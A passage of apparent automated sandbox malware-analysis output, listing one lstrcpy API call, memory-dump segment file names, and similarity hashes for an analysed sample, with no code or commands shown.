                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71693
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: cb17fa42dbb2394d8ff169ecc68bcee8fb1ddc50c7e5f883191c1a816044f2a0
                                • Instruction ID: 1663dc8260c818612d8c91e63a0975eba6557e567b4e170a838376d2c2c9447c
                                • Opcode Fuzzy Hash: cb17fa42dbb2394d8ff169ecc68bcee8fb1ddc50c7e5f883191c1a816044f2a0
                                • Instruction Fuzzy Hash: A111EF74A127029BD7649F7AD458927B7F8FF4570170C852DB89AC3A41EB30F901CB50